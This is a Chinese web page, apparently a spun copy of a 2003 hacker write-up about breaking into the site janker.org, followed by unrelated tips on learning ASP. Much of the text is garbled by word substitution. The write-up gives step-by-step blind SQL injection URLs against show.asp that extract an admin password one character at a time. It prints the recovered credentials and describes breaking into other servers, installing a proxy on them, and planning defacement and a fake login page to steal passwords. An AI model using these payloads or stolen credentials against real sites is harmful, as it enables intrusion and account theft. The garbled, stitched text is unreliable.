ASP编程：我是如许浸透进侵伶仃剑客网站(janker....

减少客户内IT专业人才缺乏带来的影响。ASP的客户员工利用浏览器进入相关的应用软件，简单易用，无需专业技术支持。我是如许浸透进侵伶仃剑客网站(janker.org)的
N.E.V.E.R
日期：2003年5月22日
出自http://www.janker.org

不乐成的进侵仍是有点自创代价的，我想一样的办法换一个中央的话，说不定就乐成了。
目标地www.janker.org，呵呵，应当算是受权了的吧。传说中的黑客叔叔们都是先踩点的，
假如我有前提的话，必定先到机房四周往看看，也许还能捡到点暗码甚么的。不外其实太远，买车


票已往的工夫说不定我都能够打一把Windforce了，仍是来点远程的吧。
拿出扫描器甲乙丙丁一阵乱扫，呵呵，了局人人都能猜到，就不空话了。归正80和23是开着的


，这个了局要记着。
体系毛病没有的话，有几种办法能够供选择：1、浸透；2、剧本毛病。固然，还能够玩


D.D.o.S，还能够背上火药包炸主机，还能够用拖网把电缆弄断，还能够开飞机把那栋楼撞了，等


等。固然这些要看打击者的设想力，我仍是老厚道实的看剧本。
找啊找啊，找了几秒钟，找到一个中央没有很好的处置参数id。
http://www.janker.org/show.asp?id=2;--
堕落了。“MicrosoftJETDatabaseEngine毛病"80040e14"在SQL语句开头以后找到字


符。”嗯，年夜虾们一定已看出来了吧？我想来想往以为这句话告知了两件事变：1、用的是


ACCESS数据库；2、剧本内里也许有甚么"whereid="&request("id")之类的没有过滤的洞洞。


关头是怎样用呢？
我仍是决意像瞎子摸象一样再看看，猜了一会儿后，以为一个公布体系远程总会有一个办理系


统吧，猜猜表名看看。
http://www.janker.org/show.asp?id=2oridin(selectidfromadmin)
OK，没有报错，那末提及来存在一个admin的表，并且这张内外面有id项，实在厥后想一想如许


欠好，子查询只是要断定一下有无admin这张表，用.....id(selectcount(*)from


admin)对照好。
持续猜，猜了几个罕见的列名，嗯，失掉的了局是有user，password。到这里的时分，我以为


我走了良多弯路，固然第一向觉是这是一个收费的公然源代码的东东，可是由于一会儿我没有认出


来是甚么（我看过的器材很少啊，呵呵……），就没有往找下载，如今猜得头晕，以为仍是应当往


找代码来看对照好。
因而我的偏向又转到怎样往找不异的东东。呵呵，很笨的，我想到了在google.coms搜刮


fir.asp，由于fir.asp是很奇异的一个名字，了局我找到了良多良多不异的站点。我以为几千个结


果内里总有十分简单进侵的呆板吧，嗯，我用的是webdavx3，约莫失利60次今后，终究找了一个进


往。固然啦，我只是要看看代码，没有其余意义，只是在这台呆板上装了socks5代办署理（呵呵），补


上毛病就出来了。
这个时分已邻近熄灯工夫，我就爽性断了网看代码，嗯，应当说是看谁人Access数据库。早


如许的话，我就会少走很多多少弯路啊，不外猜猜也很成心思，年夜脑临时不必会生锈的。
有人想到间接下数据库吧？呵呵，哪有这么简单的事变啊，数据库的名字百分之一百二被改失落


了。
嗯，归正我已晓得admin表是如何的了，猜猜暗码也还不算是太累的事情。先看看admin内里


有几个办理员。
http://www.janker.org/show.asp?id=3AND1<(selectcount(*)fromadmin)
嗯，比一个多……
http://www.janker.org/show.asp?id=3AND10<(selectcount(*)fromadmin)
没有十个……
（省略无聊历程多少）
http://www.janker.org/show.asp?id=3AND5=(selectcount(*)fromadmin)
有五个办理员呢，任意找一个破一下啊……
我选的是id=1的，我先猜的是它的暗码第一名，呵呵，暗码总要一名一名的猜嘛……
http://www.janker.org/show.asp?id=3and1=(selectidfromadminwhereleft


(password,1)="q")
嗯，显现是“未指定所需参数!”那末第一名不是q了，假如我们提交的SQL查询准确实行――也就


是我们猜对了的话，是会出来id=3的那篇文章的（后面的那些也一样）。持续来吧……
w、e、r、t、y……猜了一会儿，了局出来了。
http://www.janker.org/show.asp?id=3and1=(selectidfromadminwhereleft


(password,1)="j")
显现了id为3的那篇文章，暗码第一名为j。
停息一下，假如暗码有个2、30位的话，岂不是要猜逝世了，先看看暗码有几位再说吧。办法和


猜办理员的个数是一样的，间接给出了局
http://www.janker.org/show.asp?id=3and1=(selectidfromadminwherelen(password)=7


andid=1)
7位，恰好在我的心思接受局限以内，8位以上的话就要思索写程序猜了。推测的历程是优美的


，你看到第一名是j后会如何想呢，优先猜的一定是a、A、4、@、k之类的吧？假如你猜到了后面三


位是jk2，前面的00也会很自傲的写上往吧？最初的暗码是jk2008!，呵呵，假如你在30分钟内没有


一名一名的猜出来的话，就不要做hacker/cracker了。仍是给出历程：
http://www.janker.org/show.asp?id=3and1=(selectidfromadminwhereleft


(password,2)="jk")


http://www.janker.org/show.asp?id=3and1=(selectidfromadminwhereleft


(password,3)="jk2")


http://www.janker.org/show.asp?id=3and1=(selectidfromadminwhereleft


(password,4)="jk20")


http://www.janker.org/show.asp?id=3and1=(selectidfromadminwhereleft


(password,5)="jk200")


http://www.janker.org/show.asp?id=3and1=(selectidfromadminwhereleft


(password,6)="jk2008")


http://www.janker.org/show.asp?id=3and1=(selectidfromadminwhereleft


(password,7)="jk2008!")
嗯，人人在科场上有无掷色子做选择题的履历啊？一样平常都是扔两次吧，呵呵，验算一下也是


很需要的哦。特地把用户名也猜出来了……
http://www.janker.org/show.asp?id=3and1=(selectidfromadminwhere


password="jk2008!"andname="janker")
经由一番捣鼓，我终究失掉了一个用户名/暗码，嗯，很费光阴吧？费光阴的还在前面呢，还


有四个用户但是等着我们猜的。固然，全体失掉我想要的器材时，已是第二天的事变了，至于用


户名暗码，我就不说了，我只是说历程嘛……
然后干甚么就是定式了吧？我选择的路途是先辈进办理界面公布两条弄笑的动静，然后说不定


有甚么跨站剧本毛病，旧事是显现在首页上的，没有过滤html字符的情形下，你能够想举措建一个


1600x1200的div，背景致设定为黑，真正把它“黑”失落。大概革新到你本人假造的页面上，守候那


些习气从首页上岸的同道们的暗码</p>写软件都是想的时间比写的时间要长的.如果反过来了就得看看是什么原因了.另外大家可以回去问问公司里的小MM.(一般企业里,跟你们交付软件接触得最多的是她们)

Application:这个存储服务端的数据，如果不清除，会直到web应用程序结束才清除(例如重启站点)

作为IE上广为流传的动态网页开发技术,ASP以它简单易学博得了广大WEB程序爱好这的青睐,而且它对运行环境和开发品台的不挑剔,以及有大量有效的参考手册,极大的推广了它的发展。

另外因为asp需要使用组件，所以了解一点组件的知识(ADODB也是组件)

学习是为了用的，是为了让你的程序产生价值，把握住这个原则会比较轻松点。除此之外，课外时间一定要多参加一些社会实践活动，来锻炼自己的能力。

我认为比较好的方法是找一些比较经典的例子，每个例子比较集中一种编程思想而设计的。

以HTML语言整合(HTML负责界面上，ASP则负责功能上)形成一个B/S(浏览器/服务器)模式的网页程序。

跟学别的语言一样，先掌握变量，流程控制语句(就是ifwhileselect)等，函数/过程，数组

ASP（ActiveServerPages）是Microsfot公司1996年11月推出的WEB应用程序开发技术，它既不是一种程序语言，也不是一种开发工具，而是一种技术框架，不须使用微软的产品就能编写它的代码，能产生和执行动态、交互式、高效率的站占服务器的应用程序。